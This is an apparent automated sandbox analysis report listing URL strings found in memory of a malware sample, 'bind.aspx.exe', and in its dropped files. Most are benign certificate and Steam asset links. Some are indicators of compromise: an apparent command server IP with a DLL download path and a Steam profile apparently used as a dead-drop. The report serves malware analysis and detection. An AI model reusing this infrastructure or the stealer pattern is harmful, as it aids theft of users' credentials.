                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: bind.aspx.exeString found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://stadiatechnologies.com
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com/
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com/(
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://stadiatechnologies.comntent-Disposition:
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bind.aspx.exe, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: bind.aspx.exeString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://135.181.31.18
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/$
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/-n
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/0n9:6
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/;n
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/Fn
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/S
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/Tn%:2
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/_n
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/h
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/lnm:
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18/sqlr.dll
                    Source: bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/x
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18FCBG
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18T
                    Source: BKKFHI.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                    Source: BKKFHI.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BKKFHI.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BKKFHI.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
